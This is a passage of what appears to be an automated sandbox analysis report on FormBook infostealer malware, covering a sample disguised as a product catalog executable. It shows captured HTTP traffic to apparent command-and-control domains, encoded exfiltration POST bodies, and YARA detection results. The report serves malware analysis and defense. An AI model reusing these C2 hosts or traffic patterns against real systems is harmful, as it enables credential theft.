                                                                                              Connection: close
                                                                                              Host: www.pinkpantys.shop
                                                                                              Origin: http://www.pinkpantys.shop
                                                                                              Referer: http://www.pinkpantys.shop/cyro/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 4f 30 41 4f 36 63 74 69 4c 4d 51 73 6f 4e 44 59 4b 48 55 4f 4e 75 51 58 4c 57 66 73 4f 4e 4a 4a 49 74 34 4b 4f 56 77 66 33 71 6e 30 36 4a 47 73 43 6e 6c 61 68 68 6b 59 58 2f 4b 68 30 49 63 6a 44 53 42 73 5a 4b 70 70 46 4d 67 2f 56 65 7a 4c 49 47 54 50 39 36 43 4f 75 4b 50 4b 32 55 45 76 32 45 66 71 42 34 75 7a 58 74 72 4e 33 55 4a 63 67 51 6a 78 44 47 4d 2f 6d 48 37 65 6b 79 2f 4d 4b 43 76 7a 4f 46 77 59 69 77 44 2b 38 44 54 48 45 77 79 49 4e 79 6f 48 70 6f 5a 51 31 53 62 4d 37 67 74 4d 4f 75 64 57 6c 70 35 33 47 73 6a 68 57 30 67 38 65 43 75 34 7a 50 44 78 42 45 51 2f 72 6c 72 37 51 72 48 70 58 42 31 43 56 44 64 43 70 75 76 47 6b 59 31 45 46 59 4b 4d 7a 78 4f 43 33 5a 6d 43 58 6b 51 6a 75 45 77 4c 6c 51 72 64 69 63 38 78 44 37 2b 66 43 57 53 41 4e 66 65 61 51 53 46 6d 38 55 4b 32 68 32 63 4a 67 46 69 32 50 4f 34 73 56 5a 41 44 70 67 74 36 39 63 51 4c 49 4b 4d 38 63 33 31 61 78 48 72 65 49 71 35 4c 48 61 7a 52 65 32 53 2b 6b 63 39 77 4e 64 62 79 43 57 51 53 61 6b 45 4d 66 59 2f 44 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=O0AO6ctiLMQsoNDYKHUONuQXLWfsONJJIt4KOVwf3qn06JGsCnlahhkYX/Kh0IcjDSBsZKppFMg/VezLIGTP96COuKPK2UEv2EfqB4uzXtrN3UJcgQjxDGM/mH7eky/MKCvzOFwYiwD+8DTHEwyINyoHpoZQ1SbM7gtMOudWlp53GsjhW0g8eCu4zPDxBEQ/rlr7QrHpXB1CVDdCpuvGkY1EFYKMzxOC3ZmCXkQjuEwLlQrdic8xD7+fCWSANfeaQSFm8UK2h2cJgFi2PO4sVZADpgt69cQLIKM8c31axHreIq5LHazRe2S+kc9wNdbyCWQSakEMfY/DjO/Z5Deq1XDDjo3IoCuKgonmtwb81utQBaYtjqgJKfEkkoHJ+c3Me3eSSgDDf1bLKKM3KdO6Uz2+OvaAqXorNFVFhXZzoMme6RlFopTwQoxUIqF3IIozSJeTZH+6rYs/0MyP5ONNocXvUMOmQqn2NnAOL4xb5wzxxw1VqAY1oFjPJKv8TKHtTDEfC5VAQ60hIJXlq+Cmxa1ii+Pl/LK4z/mjUHB+AwUB7p9zuArF2ORY8XuQKu4fgsFhrJr7eTOuaj5r3VcZw6JCz55ly9e2N6B88Adq7h8c+3j/hTVkmfzwKEnWWp164oBrhUBRwJleFtnzjS/51nBMQfsebVNnnaEKs65FiQ2fKn4zX8DuAE+7KGtebQT6lNE0cL4BJbrD+xP61NlxfgJfj6DA0Vpn4PGDyO0xn3pUqMAPxo/B8+bU0EmdU+PgysMwE8D6kdZkjjNzERae4+VGhLfsA6L6qsuSJV/oVsrHnVHqadtKBLElslAI94AQ09m/WDkD23FQLunItEv9NajScQzqBGXBCTW0X9SN0yHHAoqlrAWRwkc8fdddQ4rtRnEKKQdkbVUPo5h6ApZmRkHZ7J075Rs0QhuLrGU8GP8T4gkaTkfkRJ7i4y9IqLRfSVarZoQAEQTP5b9k0uHGBM/YafdFBK6AKkJpUnsMGuM1XG [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              44192.168.2.45004984.32.84.32805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:53.816461086 CEST407OUTGET /cyro/?2FO=QBbT1R8&FJiPC=D2ou5qRFRedTipDENHRzVKYWOwvjKcFZBYoEL10S44zk2vemCWVH9CYUDPjN2ps8GyxUcJ8ddPkdaoLhExzDkdmbipzXnEU922bDAaSjGv786nVvzAi8BXE= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.pinkpantys.shop
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:30:54.511497974 CEST1236INHTTP/1.1 200 OK
                                                                                              Server: hcdn
                                                                                              Date: Tue, 08 Oct 2024 03:30:54 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 10072
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              x-hcdn-request-id: 192491e033523c84d0e076386e2cfa1c-bos-edge1
                                                                                              Expires: Tue, 08 Oct 2024 03:30:53 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                              Oct 8, 2024 05:30:54.511516094 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                              Oct 8, 2024 05:30:54.511538029 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                              Oct 8, 2024 05:30:54.511547089 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                              Oct 8, 2024 05:30:54.511590004 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                              Oct 8, 2024 05:30:54.511603117 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                                              Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                                              Oct 8, 2024 05:30:54.511620045 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                              Oct 8, 2024 05:30:54.511629105 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                                              Oct 8, 2024 05:30:54.511646986 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              45192.168.2.4500503.33.130.190805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:30:59.710211039 CEST687OUTPOST /3gg7/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.sdfhfgoool10.life
                                                                                              Origin: http://www.sdfhfgoool10.life
                                                                                              Referer: http://www.sdfhfgoool10.life/3gg7/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 37 38 6a 68 4c 58 48 41 61 4c 4d 71 56 6e 46 66 38 67 74 71 62 76 6b 4c 45 6f 71 50 2f 62 51 6d 52 31 43 66 78 46 49 68 4d 55 55 59 51 59 53 64 79 78 50 30 59 6f 36 4f 44 53 64 52 2f 6d 62 56 56 31 63 39 32 5a 62 38 43 47 31 33 49 70 7a 76 6f 53 59 61 77 5a 34 75 36 35 77 75 51 4b 6f 58 61 42 43 57 76 72 53 52 75 56 68 57 35 4e 54 69 4c 7a 46 78 56 4d 4d 71 48 35 77 2b 52 2f 48 75 4f 45 78 6b 58 41 66 65 31 74 51 63 46 50 4b 63 49 6e 4b 76 7a 66 70 5a 6c 50 79 6b 4b 6a 50 6f 63 62 72 4f 69 36 31 73 79 53 6a 7a 56 68 61 71 38 4b 67 59 53 6b 70 65 78 72 2b 45 69 49 43 43 61 67 3d 3d
                                                                                              Data Ascii: FJiPC=78jhLXHAaLMqVnFf8gtqbvkLEoqP/bQmR1CfxFIhMUUYQYSdyxP0Yo6ODSdR/mbVV1c92Zb8CG13IpzvoSYawZ4u65wuQKoXaBCWvrSRuVhW5NTiLzFxVMMqH5w+R/HuOExkXAfe1tQcFPKcInKvzfpZlPykKjPocbrOi61sySjzVhaq8KgYSkpexr+EiICCag==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              46192.168.2.4500513.33.130.190805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:31:02.740233898 CEST707OUTPOST /3gg7/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.sdfhfgoool10.life
                                                                                              Origin: http://www.sdfhfgoool10.life
                                                                                              Referer: http://www.sdfhfgoool10.life/3gg7/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 37 38 6a 68 4c 58 48 41 61 4c 4d 71 56 47 31 66 77 68 74 71 51 76 6b 45 59 34 71 50 6d 4c 51 69 52 31 65 66 78 45 4e 35 4e 6d 41 59 51 39 57 64 38 51 50 30 55 49 36 4f 62 43 64 55 79 47 62 65 56 31 42 64 32 63 37 38 43 43 64 33 49 74 33 76 76 6c 4d 46 78 4a 34 73 77 70 77 6f 66 71 6f 58 61 42 43 57 76 72 47 37 75 56 70 57 35 63 6a 69 4a 57 35 79 63 73 4d 70 58 70 77 2b 61 66 48 71 4f 45 77 78 58 44 62 34 31 75 6b 63 46 50 36 63 5a 57 4b 67 6b 76 70 62 37 50 7a 4c 44 68 4f 33 59 36 58 4f 6a 61 5a 4a 39 78 76 73 55 6e 4c 77 74 37 42 50 41 6b 4e 74 73 73 33 77 76 4c 2f 4c 42 68 4c 53 4b 64 78 56 67 7a 74 44 42 66 4c 37 4b 79 46 63 50 76 49 3d
                                                                                              Data Ascii: FJiPC=78jhLXHAaLMqVG1fwhtqQvkEY4qPmLQiR1efxEN5NmAYQ9Wd8QP0UI6ObCdUyGbeV1Bd2c78CCd3It3vvlMFxJ4swpwofqoXaBCWvrG7uVpW5cjiJW5ycsMpXpw+afHqOEwxXDb41ukcFP6cZWKgkvpb7PzLDhO3Y6XOjaZJ9xvsUnLwt7BPAkNtss3wvL/LBhLSKdxVgztDBfL7KyFcPvI=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              47192.168.2.4500523.33.130.190805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:31:05.292769909 CEST10789OUTPOST /3gg7/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.sdfhfgoool10.life
                                                                                              Origin: http://www.sdfhfgoool10.life
                                                                                              Referer: http://www.sdfhfgoool10.life/3gg7/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 37 38 6a 68 4c 58 48 41 61 4c 4d 71 56 47 31 66 77 68 74 71 51 76 6b 45 59 34 71 50 6d 4c 51 69 52 31 65 66 78 45 4e 35 4e 6d 59 59 51 50 65 64 38 7a 6e 30 61 6f 36 4f 58 69 64 56 79 47 62 35 56 31 5a 52 32 63 32 4a 43 41 6c 33 4f 2b 76 76 75 51 77 46 6b 5a 34 73 2b 35 77 70 51 4b 6f 4f 61 43 71 4a 76 72 57 37 75 56 70 57 35 65 37 69 66 54 46 79 61 73 4d 71 48 35 77 36 52 2f 48 53 4f 46 5a 47 58 43 75 44 79 59 55 63 46 76 71 63 62 45 53 67 34 2f 70 64 2b 50 7a 54 44 68 43 53 59 37 36 31 6a 61 64 33 39 32 6e 73 57 52 43 38 77 6f 52 34 52 33 46 51 76 66 58 52 70 71 76 71 47 68 76 71 4d 64 78 52 36 69 6c 6f 41 6f 66 79 5a 79 4a 48 4e 4a 50 67 39 78 71 4b 36 6a 4b 49 78 54 38 57 41 62 66 31 31 50 77 6f 52 38 77 7a 65 2f 48 77 7a 62 50 79 36 38 74 4b 76 34 6f 43 72 57 46 53 4b 2f 6e 62 63 55 77 38 35 49 7a 4f 75 76 2f 72 57 6e 46 4d 4a 76 6b 75 67 36 6e 6a 34 4f 4a 73 7a 5a 30 4d 41 55 7a 37 34 4b 56 71 30 68 5a 6d 67 57 48 35 5a 30 31 73 32 4c 2b 5a 42 4a 42 77 61 6d 71 2f 72 45 68 48 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=78jhLXHAaLMqVG1fwhtqQvkEY4qPmLQiR1efxEN5NmYYQPed8zn0ao6OXidVyGb5V1ZR2c2JCAl3O+vvuQwFkZ4s+5wpQKoOaCqJvrW7uVpW5e7ifTFyasMqH5w6R/HSOFZGXCuDyYUcFvqcbESg4/pd+PzTDhCSY761jad392nsWRC8woR4R3FQvfXRpqvqGhvqMdxR6iloAofyZyJHNJPg9xqK6jKIxT8WAbf11PwoR8wze/HwzbPy68tKv4oCrWFSK/nbcUw85IzOuv/rWnFMJvkug6nj4OJszZ0MAUz74KVq0hZmgWH5Z01s2L+ZBJBwamq/rEhHS9g33WpYfwts///AbPjJJlOsM4ei0YNQprcjIz+oX/HRTxkjYFj/Dju8CwG7gfoRVe9KPyqBPS5HciceyfI4I07x01CMyY62K1KyiIct/dZs+emyib/XQfUgCrLzA4Y7/66IGjH3XzSSu+HgFt2BgfD9bLwLjvq23TK8RZZ9cPiJXTC8r71D27+EuY0IfFtWP9BWAzyZ0oL76VmxBckOg/vWJ1T4vAedPqzhVqc3O5D9J5orB3Y+uKaHoKnR72UwmRR+XKSqVpvZLCfbh4ys5rGARYp2OI8jlEyhYlFPPyDWeOjsKORo9jeSO1AoIORIa1nCKOsjM48VZvLWpM4o86DxUdsk+BjNpAXhYm7l8AX/pvLd4ae9UIO3Jc9MYrT1k7F1AnOWRA7AKsyaqIwnLiJTeaDfvHruAS6Dl8GZ/LsKcOAvClNof5Pjvp4rW+ZiNzg7MC1tBLV2/gK5ftpFou/k7GnI1XaPRs7ziF9vT7UwU3QgYaA7HHXmRRAcfpjCyHCs4D15et+pR0V0ar6I+qoR0FGOFpzwBA2DK51uSB3f0jzMrjr03yIITw3iFRlzdU9R7ouazoaRlYcxrs0MKdEtPlNA4KrDJqbkszLIK+Bdkud2miDzLY0wu1aHYwCPyxdiKdaXht7N/BlLsF7AxWGmKCohSJRPG8 [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              48192.168.2.4500533.33.130.190805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:31:07.835439920 CEST409OUTGET /3gg7/?FJiPC=2+LBIiP/KoEhdnR3xwwMWckHXd3s+f0VYUCn+2NFE1occ+/W1XHNdoCDAgJCjDzuYXNE98f+eghrY5vQi1M98KcZ1LEUY4gMUibOg5uc8EJhnuelY3pNbdk=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.sdfhfgoool10.life
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:31:08.351483107 CEST393INHTTP/1.1 200 OK
                                                                                              Server: openresty
                                                                                              Date: Tue, 08 Oct 2024 03:31:08 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 253
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4a 69 50 43 3d 32 2b 4c 42 49 69 50 2f 4b 6f 45 68 64 6e 52 33 78 77 77 4d 57 63 6b 48 58 64 33 73 2b 66 30 56 59 55 43 6e 2b 32 4e 46 45 31 6f 63 63 2b 2f 57 31 58 48 4e 64 6f 43 44 41 67 4a 43 6a 44 7a 75 59 58 4e 45 39 38 66 2b 65 67 68 72 59 35 76 51 69 31 4d 39 38 4b 63 5a 31 4c 45 55 59 34 67 4d 55 69 62 4f 67 35 75 63 38 45 4a 68 6e 75 65 6c 59 33 70 4e 62 64 6b 3d 26 32 46 4f 3d 51 42 62 54 31 52 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FJiPC=2+LBIiP/KoEhdnR3xwwMWckHXd3s+f0VYUCn+2NFE1occ+/W1XHNdoCDAgJCjDzuYXNE98f+eghrY5vQi1M98KcZ1LEUY4gMUibOg5uc8EJhnuelY3pNbdk=&2FO=QBbT1R8"}</script></head></html>


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:23:27:07
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Users\user\Desktop\Products Order Catalogs20242.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Products Order Catalogs20242.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'323'139 bytes
                                                                                              MD5 hash:9835B14881B3B27767CDDA4FAFDB3506
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:23:27:08
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Products Order Catalogs20242.exe"
                                                                                              Imagebase:0xb0000
                                                                                              File size:46'504 bytes
                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:23:27:43
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe"
                                                                                              Imagebase:0xce0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:6
                                                                                              Start time:23:27:45
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Windows\SysWOW64\find.exe
                                                                                              Wow64 process (32bit):true
